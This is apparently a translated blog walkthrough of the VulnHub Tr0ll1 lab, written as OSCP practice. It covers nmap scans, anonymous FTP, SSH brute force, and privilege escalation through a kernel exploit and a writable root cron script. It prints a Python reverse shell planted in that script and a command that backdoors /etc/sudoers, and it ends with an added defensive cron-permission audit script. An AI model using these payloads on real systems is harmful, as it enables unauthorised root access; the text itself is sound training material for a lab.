2025/2/24 6:45:50 Source: https://blog.csdn.net/2202_75361164/article/details/145813532

Preface

OSCP prep, OSCP series: Tr0ll1 machine, two privilege-escalation paths, FTP anonymous login, SSH brute force, Ubuntu kernel exploit, cron job
Difficulty: easy

  • Low-privilege shell: FTP anonymous login, SSH brute force
  • Privilege escalation: Ubuntu kernel exploit, cron job
    Download:
https://www.vulnhub.com/entry/tr0ll-1,100/

nmap

Host discovery

└─# nmap -sn 10.10.10.0/24                         
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-09 12:19 CST
Nmap scan report for 10.10.10.1
Host is up (0.00043s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.10.2
Host is up (0.00034s latency).
MAC Address: 00:50:56:F2:C6:98 (VMware)
Nmap scan report for 10.10.10.141
Host is up (0.00038s latency).
MAC Address: 00:0C:29:96:4F:09 (VMware)
Nmap scan report for 10.10.10.254
Host is up (0.00028s latency).
MAC Address: 00:50:56:FB:0C:2B (VMware)
Nmap scan report for 10.10.10.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.20 seconds

Port scan

└─# nmap --min-rate 10000 -p- 10.10.10.141        
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-09 12:20 CST
Nmap scan report for 10.10.10.141
Host is up (0.0022s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:96:4F:09 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 6.03 seconds

Detailed port scan

└─# nmap -sV -sT -sC -O -p21,22,80 10.10.10.141     
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-09 12:21 CST
Nmap scan report for 10.10.10.141
Host is up (0.00060s latency).
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.10.128
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 600
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 09  2014 lol.pcap [NSE: writeable]
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|   256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_  256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_/secret
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:96:4F:09 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.61 seconds

Vuln script scan

└─# nmap --script=vuln -p21,22,80 10.10.10.141
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-09 12:22 CST
Nmap scan report for 10.10.10.141
Host is up (0.00053s latency).
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-enum: 
|   /robots.txt: Robots file
|_  /secret/: Potentially interesting folder
MAC Address: 00:0C:29:96:4F:09 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 321.30 seconds

Information gathering

FTP, port 21

The nmap scan shows that anonymous login is allowed.
Download the file and inspect it

└─# strings lol.pcap         
Linux 3.12-kali1-486
Dumpcap 1.10.2 (SVN Rev 51934 from /trunk-1.10)
eth0	
host 10.0.0.6
Linux 3.12-kali1-486
220 (vsFTPd 3.0.2)
"USER anonymous
331 Please specify the password.
PASS password
230 Login successful.
SYST
215 UNIX Type: L8
PORT 10,0,0,12,173,198
200 PORT command successful. Consider using PASV.
LIST
150 Here comes the directory listing.
-rw-r--r--    1 0        0             147 Aug 10 00:38 secret_stuff.txt
226 Directory send OK.
TYPE I
W200 Switching to Binary mode.
PORT 10,0,0,12,202,172
g>	@
W200 PORT command successful. Consider using PASV.
RETR secret_stuff.txt
W150 Opening BINARY mode data connection for secret_stuff.txt (147 bytes).
WWell, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P
Sucks, you were so close... gotta TRY HARDER!
W226 Transfer complete.
TYPE A
O200 Switching to ASCII mode.
{PORT 10,0,0,12,172,74
O200 PORT command successful. Consider using PASV.
{LIST
O150 Here comes the directory listing.
O-rw-r--r--    1 0        0             147 Aug 10 00:38 secret_stuff.txt
O226 Directory send OK.
{QUIT
221 Goodbye.
Counters provided by dumpcap

This reveals the directory /sup3rs3cr3tdirlol

Web page, port 80

Checking the page source, the image is named hacker; download it and take a look.
Nothing useful turns up in the source.

Directory scan

Same results as the nmap scan:
/robots.txt
/secret/

Download the file from the /sup3rs3cr3tdirlol directory

This reveals a directory, 0x0856BF
Inside it are two folders
Contents of the file that looks like a username list

maleus
ps-aux
felux
Eagle11
genphlux < -- Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow

Contents of the file that looks like a password

Good_job_:)

Exploitation

SSH brute force

Trying SSH brute force with the following usernames

genphlux
usmc8892
blawrg
wytshadow
vis1t0r
overflow
maleus
ps-aux
felux
Eagle11
root

Passwords

Good_job_:)
good_job_:)
Pass.txt
password

Valid credentials found

overflow/Pass.txt

SSH login succeeded

Privilege escalation

Ubuntu kernel exploit

Check the version

overflow@troll:/$ uname -a
Linux troll 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 athlon i686 GNU/Linux
overflow@troll:/$ lsb_release
No LSB modules are available.
overflow@troll:/$ cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"
NAME="Ubuntu"
VERSION="14.04.1 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.1 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"

The version is quite old, so try a kernel exploit; a search turns up one that fits this kernel.
The exploit runs successfully and yields root privileges.

Cron job

Looking for a cron job that runs a file the low-privilege user can modify

find / -uid 0 -perm -o+w -type f 2>/dev/null | grep -v -E '/proc|/sys'
find / -name "*cronlog*" 2>/dev/null

This yields

/lib/log/cleaner.py

Use vim to write a reverse shell into that script

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.10.128",6666));os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
import pty
pty.spawn("/bin/bash")

Alternatively, grant the user unrestricted sudo rights, after which sudo /bin/bash gives a root shell directly

echo "overflow ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
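Defender-side check for the misconfiguration this section abuses, added here and not part of the original write-up: a root cron job executing a script that group or others can modify (the /lib/log/cleaner.py pattern). The crontab text and file paths below are constructed samples, not the target's real files.

```shell
#!/bin/sh
# Added audit helper (not from the original write-up). Lists the scripts a
# system crontab runs as root and flags any that group or others can write to.

# Print the first absolute path on each non-comment line of system-crontab text
# (fields: min hour dom mon dow user command...), e.g. "/lib/log/cleaner.py"
# from "python /lib/log/cleaner.py". Reads crontab text from stdin.
cron_script_paths() {
    awk '!/^[[:space:]]*#/ && NF >= 7 {
        for (i = 7; i <= NF; i++) if ($i ~ /^\//) { print $i; break }
    }'
}

# Return 0 if group or others have write permission on FILE (ls -l columns 6/9).
is_group_or_world_writable() {
    mode=$(ls -ld "$1" 2>/dev/null | cut -c1-10) || return 1
    [ "$(printf '%s' "$mode" | cut -c6)" = "w" ] ||
    [ "$(printf '%s' "$mode" | cut -c9)" = "w" ]
}

# audit_crontab_file CRONTAB: report every referenced script writable by
# non-owners. Prints "RISK: ..." per finding; exit status = number of findings.
audit_crontab_file() {
    count=0
    for p in $(cron_script_paths < "$1"); do
        [ -e "$p" ] || continue   # dangling entries are a separate concern
        if is_group_or_world_writable "$p"; then
            echo "RISK: $p is writable by group/others but runs from root cron"
            count=$((count + 1))
        fi
    done
    return $count
}

# Self-contained demo on constructed files in a temp dir: one weak (mode 777)
# cleaner.py next to one correctly protected (mode 755) script.
demo_audit() {
    d=$(mktemp -d)
    mkdir -p "$d/lib/log"
    printf 'print("cleaning")\n' > "$d/lib/log/cleaner.py"
    chmod 777 "$d/lib/log/cleaner.py"          # the weak setting
    printf '#!/bin/sh\n' > "$d/safe.sh"; chmod 755 "$d/safe.sh"
    cat > "$d/crontab" <<EOF
# constructed sample system crontab
*/2 * * * * root python $d/lib/log/cleaner.py
0 3 * * * root $d/safe.sh --quiet
EOF
    audit_crontab_file "$d/crontab"; n=$?
    rm -rf "$d"
    return $n
}
```

Run it against /etc/crontab and the files in /etc/cron.d on a real host; a non-zero exit status means at least one root-executed script is modifiable by unprivileged users.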
